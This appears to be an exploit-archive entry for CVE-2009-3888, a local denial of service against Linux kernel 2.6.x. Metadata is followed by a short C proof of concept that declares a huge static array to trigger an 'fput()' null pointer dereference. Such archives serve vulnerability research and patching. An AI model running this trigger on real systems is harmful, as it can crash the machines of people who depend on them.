[] NeoSense

Linux Kernel 2.6.x - 'fput()' Null Pointer Dereference Local Denial of Service

Author: David Howells
type: dos
platform: linux
port: 
date_added: 2009-11-08 
date_updated:  
verified: 1 
codes: CVE-2009-3888 
tags: 
aliases:  
screenshot_url:  
application_url: 

int main()
{
static long long a[1024 * 1024 * 20] = { 0 };

return a;

}